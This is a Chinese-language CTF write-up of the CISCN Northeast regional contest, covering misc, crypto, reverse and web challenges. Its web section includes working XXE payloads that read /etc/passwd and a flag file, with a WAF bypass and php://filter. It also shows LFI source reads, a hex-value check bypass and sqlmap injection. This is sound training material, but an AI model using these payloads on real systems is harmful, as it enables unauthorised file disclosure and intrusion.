CISCN东北赛区WP
in 学习 on Ctf
CISCN东北赛区WP
这次比赛没看Web,而是和我的小姑娘做了不少密码学的题目,虽然都不咋算是密码吧,但是大学的最后一次CTF,玩的开心就好。 以下WP斜体的是学弟做的。
MISC
签到
压缩包里给了二维码和扫码工具,直接出Flag。
sudoku
z3解出来数独,左上右下斜对角线为压缩包密码。
Vigenère
binwalk解出来b.txt,按照明示结果是Vigenère密码,没有key,直接爆破,得到密码faisnigslk和明文。
IhaveaDreambyMartinLutherKingJrDeliveredonthestepsattheLincolnMemorialinWashingtonDConAugustFivescoreyearsagoagreatAmericaninwhosesymbolicshadowwestandsignedtheEmancipationProclamationThismomentousdecreecameasagreatbeaconlightofhopetomillionsofNegroslaveswhohadbeensearedintheflamesofwitheringinjusticeItcameasajoyousdaybreaktoendthelongnightofcaptivityButonehundredyearslaterwemustfacethetragicfactthattheNegroisstillnotfreeOnehundredyearslaterthelifeoftheNegroisstillsadlycrippledbythemanaclesofsegregationandthechainsofdiscriminationOnehundredyearslatertheNegrolivesonalonelyislandofpovertyinthemidstofavastoceanofmaterialprosperityOnehundredyearslatertheNegroisstilllanguishinginthecornersofAmericansocietyandfindshimselfanexileinhisownlandSowehavecomeheretodaytodramatizeanappallingconditionInasensewehavecometoournationscapitaltocashacheckWhenthearchitectsofourrepublicwrotethemagnificentwordsoftheConstitutionandthedeclarationofIndependencetheyweresigningapromissorynotetowhicheveryAmericanwastofallheirThisnotewasapromisethatallmenwouldbeguaranteedtheinalienablerightsoflifelibertyandthepursuitofhappinessItisobvioustodaythatAmericahasdefaultedonthispromissorynoteinsofarashercitizensofcolorareconcernedInsteadofhonoringthissacredobligationAmericahasgiventheNegropeopleabadcheckwhichhascomebackmarkedinsufficientfundsButwerefusetobelievethatthebankofjusticeisbankruptWerefusetobelievethatthereareinsufficientfundsinthegreatvaultsofopportunityofthisnationSowehavecometocashthischeckacheckthatwillgiveusupondemandtherichesoffreedomandthesecurityofjusticeWehavealsocometothishallowedspottoremindAmericaofthefierceurgencyofnowThisisnotimetoengageintheluxuryofcoolingoffortotakethetranquilizingdrugofgradualismNowisthetimetorisefromthedarkanddesolatevalleyofsegregationtothesunlitpathofracialjusticeNowisthetimetoopenthedoorsofopportunitytoallofGodschildrenNowisthetimetoliftournationfromthequicksandsofracialinjusticetothesolidrockofbrotherhoodItwouldbefatalforthenationtooverlooktheurgencyofthemomentandtounderestimatethedeterminationoftheNegroThisswelteringsummeroftheNegroslegitimatediscontentwillnotpassuntilthereisaninvigoratingautumnoffreedomandequalityNineteensixtythreeisnotanendbutabeginningThosewhohopethattheNegroneededtoblowoffsteamandwillnowbecontentwillhavearudeawakeningifthenationreturnstobusinessasusualTherewillbeneitherrestnortranquilityinAmericauntiltheNegroisgrantedhiscitizenshiprightsThewhirlwindsofrevoltwillcontinuetoshakethefoundationsofournationuntilthebrightdayofjusticeemergesButthereissomethingthatImustsaytomypeoplewhostandonthewarmthresholdwhichleadsintothepalaceofjusticeIntheprocessofgainingourrightfulplacewemustnotbeguiltyofwrongfuldeedsLetusnotseektosatisfyourthirstforfreedombydrinkingfromthecupofbitternessandhatredWemustforeverconductourstruggleonthehighplaneofdignityanddisciplineWemustnotallowourcreativeprotesttodegenerateintophysicalviolenceAgainandagainwemustrisetothemajesticheightsofmeetingphysicalforcewithsoulforceThemarvelousnewmilitancywhichhasengulfedtheNegrocommunitymustnotleadustodistrustofallwhitepeopleformanyofourwhitebrothersasevidencedbytheirpresenceheretodayhavecometorealizethattheirdestinyistiedupwithourdestinyandtheirfreedomisinextricablyboundtoourfreedomWecannotwalkaloneAndaswewalkwemustmakethepledgethatweshallmarchaheadWecannotturnbackTherearethosewhoareaskingthedevoteesofcivilrightsWhenwillyoubesatisfiedWecanneverbesatisfiedaslongasourbodiesheavywiththefatigueoftravelcannotgainlodginginthemotelsofthehighwaysandthehotelsofthecitiesWecannotbesatisfiedaslongastheNegrosbasicmobilityisfromasmallerghettotoalargeroneWecanneverbesatisfiedaslongasaNegroinMississippicannotvoteandaNegroinNewYorkbelieveshehasnothingforwhichtovoteNonowearenotsatisfiedandwewillnotbesatisfieduntiljusticerollsdownlikewatersandrighteousnesslikeamightystreamIamnotunmindfulthatsomeofyouhavecomehereoutofgreattrialsandtribulationsSomeofyouhavecomefreshfromnarrowcellsSomeofyouhavecomefromareaswhereyourquestforfreedomleftyoubatteredbythestormsofpersecutionandstaggeredbythewindsofpolicebrutalityYouhavebeentheveteransofcreativesufferingContinuetoworkwiththefaiththatunearnedsufferingisredemptiveGobacktoMississippigobacktoAlabamagobacktoGeorgiagobacktoLouisianagobacktotheslumsandghettosofournortherncitiesknowingthatsomehowthissituationcanandwillbechangedLetusnotwallowinthevalleyofdespairIsaytoyoutodaymyfriendsthatinspiteofthedifficultiesandfrustrationsofthemomentIstillhaveadreamItisadreamdeeplyrootedintheAmericandreamIhaveadreamthatonedaythisnationwillriseupandliveoutthetruemeaningofitscreedWeholdthesetruthstobeselfevidentthatallmenarecreatedequalIhaveadreamthatonedayontheredhillsofGeorgiathesonsofformerslavesandthesonsofformerslaveownerswillbeabletositdowntogetheratatableofbrotherhoodIhaveadreamthatonedayeventhestateofMississippiadesertstateswelteringwiththeheatofinjusticeandoppressionwillbetransformedintoanoasisoffreedomandjusticeIhaveadreamthatmyfourchildrenwillonedayliveinanationwheretheywillnotbejudgedbythecoloroftheirskinbutbythecontentoftheircharacterIhaveadreamtodayIhaveadreamthatonedaythestateofAlabamawhosegovernorslipsarepresentlydrippingwiththewordsofinterpositionandnullificationwillbetransformedintoasituationwherelittleblackboysandblackgirlswillbeabletojoinhandswithlittlewhiteboysandwhitegirlsandwalktogetherassistersandbrothersIhaveadreamtodayIhaveadreamthatonedayeveryvalleyshallbeexaltedeveryhillandmountainshallbemadelowtheroughplaceswillbemadeplainandthecrookedplaceswillbemadestraightandthegloryoftheLordshallberevealedandallfleshshallseeittogetherThisisourhopeThisisthefaithwithwhichIreturntotheSouthWiththisfaithwewillbeabletohewoutofthemountainofdespairastoneofhopeWiththisfaithwewillbeabletotransformthejanglingdiscordsofournationintoabeautifulsymphonyofbrotherhoodWiththisfaithwewillbeabletoworktogethertopraytogethertostruggletogethertogotojailtogethertostandupforfreedomtogetherknowingthatwewillbefreeonedayThiswillbethedaywhenallofGodschildrenwillbeabletosingwithanewmeaningMycountrytisoftheeSweetlandoflibertyoftheeIsingLandwheremyfathersdiedLandofthepilgrimsprideFromeverymountainsideLetfreedomringAndifAmericaistobeagreatnationthismustbecometrueSoletfreedomringfromtheprodigioushilltopsofNewHampshireLetfreedomringfromthemightymountainsofNewYorkLetfreedomringfromtheheighteningAllegheniesofPennsylvaniaLetfreedomringfromthesnowcappedRockiesofColoradoLetfreedomringfromthecurvaceouspeaksofCaliforniaButnotonlythatletfreedomringfromStoneMountainofGeorgiaLetfreedomringfromLookoutMountainofTennesseeLetfreedomringfromeveryhillandeverymolehillofMississippiFromeverymountainsideletfreedomringWhenweletfreedomringwhenweletitringfromeveryvillageandeveryhamletfromeverystateandeverycitywewillbeabletospeedupthatdaywhenallofGodschildrenblackmenandwhitemenJewsandGentilesProtestantsandCatholicswillbeabletojoinhandsandsinginthewordsoftheoldNegrospiritualFreeatlastfreeatlastthankGodalmightywearefreeatlast
明文是我有一个梦想原文没什么用,把key进行md5就是flag。
huahua
压缩包文件头破损,直接改为504b0304解压出来图片png,缺少png头,直接加上89504e47,crc报错,改高看到flag。
flagpng
png宽爆破。
import zlib
import struct
from tqdm import tqdm
# 同时爆破宽度和高度
filename = 图片地址
with open(filename, 'rb') as f:
all_b = f.read()
data = bytearray(all_b[12:29])
n = 4095
for w in tqdm(range(n)):
width = bytearray(struct.pack('>i', w))
for h in range(n):
height = bytearray(struct.pack('>i', h))
for x in range(4):
data[x+4] = width[x]
data[x+8] = height[x]
crc32result = zlib.crc32(data)
#替换成图片的crc
if crc32result == 0x7D045233:
print("宽为:", end = '')
print(width, end = ' ')
print(int.from_bytes(width, byteorder='big'))
print("高为:", end = '')
print(height, end = ' ')
print(int.from_bytes(height, byteorder='big'))
easy_rsa
import ContinuedFractions, Arithmetic, RSAvulnerableKeyGenerator
import binascii
def hack_RSA(e,n):
'''
Finds d knowing (e,n)
applying the Wiener continued fraction attack
'''
frac = ContinuedFractions.rational_to_contfrac(e, n)
convergents = ContinuedFractions.convergents_from_contfrac(frac)
for (k,d) in convergents:
#check if d is actually the key
if k!=0 and (e*d-1)%k == 0:
phi = (e*d-1)//k
s = n - phi + 1
# check if the equation x^2 - s*x + n = 0
# has integer roots
discr = s*s - 4*n
if(discr>=0):
t = Arithmetic.is_perfect_square(discr)
if t!=-1 and (s+t)%2==0:
print("Hacked!")
return d
# TEST functions
def test_hack_RSA():
print("Testing Wiener Attack")
while(times>0):
e,n,d = RSAvulnerableKeyGenerator.generateKeys(1024)
print("(e,n) is (", e, ", ", n, ")")
print("d = ", d)
hacked_d = hack_RSA(e, n)
if d == hacked_d:
print("Hack WORKED!")
else:
print("Hack FAILED")
print("d = ", d, ", hacked_d = ", hacked_d)
print("-------------------------")
times -= 1
if __name__ == "__main__":
#test_is_perfect_square()
#print("-------------------------")
# test_hack_RSA()
e = 932333292871340311536583425772799788581476608800501618257200913635688712797956595013312457091949241781390707236218326324287260096872275100972804737277188856396706341586791458364387568557914836880210799183882901779150174060503451992261799576875742788774243390310560719634789720219992974946820314802939572580353
n = 1083178419603719448638799632475202672644727971741749926078568673467491721729891939162664192885208434541370193744078154888072589708037117486860213089624795029582525501783298026959443870222339003799747202112246474259375161019073230508249672271697738321500894559008261698558072028050806042318719109646040290668273
c = 629671321698958970045785762020010033814849277886377341930329645318473402676175912514800812974363555981287129835454344489639514895119374277833430799149513068930055615330516662428479865724507981237582779353644800423513485357718723908554543915240117995464419165823214748496569735844685568687856495834900999682293
d=hack_RSA(e, n)
print('d=',d)
m=pow(c, d,n)
print('m=',m)
b = hex(m) #转换成相同的字符串即'0x665554'
b = b[2:] #截取掉'0x'
c = binascii.a2b_hex(b) #转换成ASCii编码的字符串
print(c)
crypto
superman
010打开图片,发现文件头被动了,88改成89,解开是个超人图片和一句iamback,文件尾找到了个类似base64的东西,解了一下发现是个salted,cyberchef走起,发现解开还是一层,密码都没变
Sign me up
'''
多次base64,base32,base16编码
自动转换明文
BY-ZYA
'''
import codecs
import base64
import re
basestring = b"U2FsdGVkX183lRElTLLADdk5IuMJH7LkLIyITIxXFSBsTbEI8TnmabzF6BTvpoRUHCSc7tprlyVqpBX8bCaN833NjMzk0yRXFJNlNBimahWrja++4RwE8/BllIrnHI6eFXk4ZcUEptAJV7OYJkLkdg=="
while(1):
base64_flag=0
basestring = codecs.decode(basestring,"utf8")
print(basestring+"\n")
if '{' in basestring:
break
for i in basestring:
if(i.islower()):
basestring = base64.b64decode(basestring)
print("base64 decode:")
base64_flag=1
break
if(base64_flag):
continue
elif(re.match('^[G-Z]',basestring)):
print("base32 decode:")
basestring=base64.b32decode(basestring)
continue
else:
print("base16 decode:")
basestring=base64.b16decode(basestring)
continue
print ("-"*50+"\nPlain text: "+basestring)
凯撒unicode
看到一堆繁体汉字,猜想是unicode的偏移,写出来了发现偏移的大部分是汉字,猜想是跑出来繁体汉字然后语言读出来的flag,肉眼看了几千条也没看出啥。 最后尝试向英文字母偏移,最后在圆角部分发现了flag。
var strIn = "怦恺恮恫怦恗恴悁恴怵恲恾恼恴悂怳悃恷恴恬悄恽恀恲怿恳恴怽恪恵恀恐恶恀悂悊恂恲恂恱恇恂恁恁恇恆恰恄恄恆恇恱恂恄恀恀恵恲恳恆恃恇恅恵恃恴恵恈悌怵怴恞怲怲怴怵恟怰怲怮怮恣恠恡怴怱怵怳";
for (offset = -25000; offset < -24000; offset++) {
// console.log(i)
var strOut = "", nCode;
for (var i = 0; i < strIn.length; i++) {
nCode = strIn.charCodeAt(i);
if (nCode == 13) // \r
strOut += "\r"; // do nothing
else if (nCode == 10) // \n
strOut += "\n"
else if (nCode == 32) // space
strOut += " ";
else
strOut += String.fromCharCode(strIn.charCodeAt(i) + offset);
}
ciphertext
jsfuck、brainfuck、ook -> flag。
re
signin
cat CrakeME.exe | grep 'flag'
WEB
flagin
这题打开页面看到是一个登陆页面,这里直接随意填值然后用Burp Suite拦截,可以在burp的proxy页面看到拦截的post内容如下
<user>
<username>admin</username>
<password>admin</password>
</user>
直接按照普通的xxe打过去
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<user><username>&xxe;</username><password>admin</password></user>
然后发现内容被waf拦截,考虑到这题有过滤传过去的内容,尝试绕过过滤。这里经过尝试之后发现是对<?xml进行了过滤,那这里直接去掉,按照xml的标准的话也能够正常解析。
之后发现正常回显,出现了passwd中的内容
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<user><username>&xxe;</username><password>admin</password></user>
之后就尝试读取flag文件。按照经验分别读取/flag和/flag.txt两个文件。发现/flag无回显,而/flag.txt返回值为读取flag的姿势不对,换一种姿势再试吧。遂这里采用php://filter伪协议进行flag的读取,正常出现flag经base64加密后的值
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "php://read=convert.base64-encode/resource=/flag.txt" >]>
<user><username>&xxe;</username><password>admin</password></user>
Be Careful
进入题目http://10.3.120.25/index.php?file=,发现有个LFI的点,从这个点进行利用。
先用php://filter/read=convert.base64-encode/resource=index.php读出index.php里边的内容,发现里边用stristr过滤了内容
拉到最底下看到有个real_flag.php文件,继续读出这个文件的内容php://filter/read=convert.base64-encode/resource=real_flag.php
这里内容的话要求a的值为69563214562,但是又不能是这个值
这里使用16进制值进行访问,访问的URL为http://10.3.120.25/real_flag.php?a=0x10324A6AE2,直接访问得到flag
简单的注入
进入页面看到登录框,想到sql注入
这里直接用sqlmap一把梭即可,直接得到admin用户的用户名和密码
之后使用admin的用户名和密码登录即可得到flag
